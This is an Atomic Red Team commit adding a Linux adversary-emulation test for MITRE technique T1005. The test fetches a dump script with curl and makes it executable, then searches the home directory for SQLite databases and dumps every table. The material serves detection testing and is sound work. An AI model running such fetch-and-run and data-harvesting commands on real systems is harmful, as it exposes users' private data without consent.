T1005 Find and dump sqlite databases (Linux) (#2402)

redcanaryco · Nov 9, 2023 · 07225ec · 07225ec
1 parent 0287e75
commit 07225ec
Show file tree

Hide file tree

Showing 4 changed files with 67 additions and 2 deletions.
diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml
@@ -1,5 +1,5 @@
 attack_technique: T1005
-display_name: 'Data from Local System'
+display_name: Data from Local System
 atomic_tests:
 - name: Search files of interest and save them to a single zip file (Windows)                                  
   auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
@@ -52,4 +52,38 @@ atomic_tests:
       Remove-Item -Path  $outputZip\data.zip -Force
 
     name: powershell
-    elevation_required: false
+    elevation_required: false
+- name: Find and dump sqlite databases (Linux)
+  description: |
+    An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+        cd $HOME
+        curl -O #{remote_url}/art
+        curl -O #{remote_url}/gta.db
+        curl -O #{remote_url}/sqlite_dump.sh
+        chmod +x sqlite_dump.sh
+        find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
+    cleanup_command: |
+        rm -f $HOME/.art
+        rm -f $HOME/gta.db
+        rm -f $HOME/sqlite_dump.sh 
diff --git a/atomics/T1005/src/art b/atomics/T1005/src/art
diff --git a/atomics/T1005/src/gta.db b/atomics/T1005/src/gta.db
diff --git a/atomics/T1005/src/sqlite_dump.sh b/atomics/T1005/src/sqlite_dump.sh
@@ -0,0 +1,31 @@
+#!/bin/bash
+
+# This script will dump each table in a sqlite 3 database
+
+# Check if the first command-line argument is empty
+if [ -z "$1" ]; then
+  echo "Error: No filename provided. Exiting..."
+  exit 1
+fi
+
+# Set the name of the SQLite database file
+DB_NAME=$1
+
+if [ "$(head -c 15 $DB_NAME |strings)" == "SQLite format 3" ]
+then
+    # List all tables
+    echo "List of tables:"
+    sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';"
+
+    # Retrieve all rows from each table
+    tables=$(sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';")
+    echo "Retrieving data from tables:"
+    for table in $tables; do
+        echo "Table: $table"
+        sqlite3 $DB_NAME "SELECT * FROM $table;"
+    done
+    echo ""
+else
+    echo "Error: The file is not a sqlite database."
+    exit 1
+fi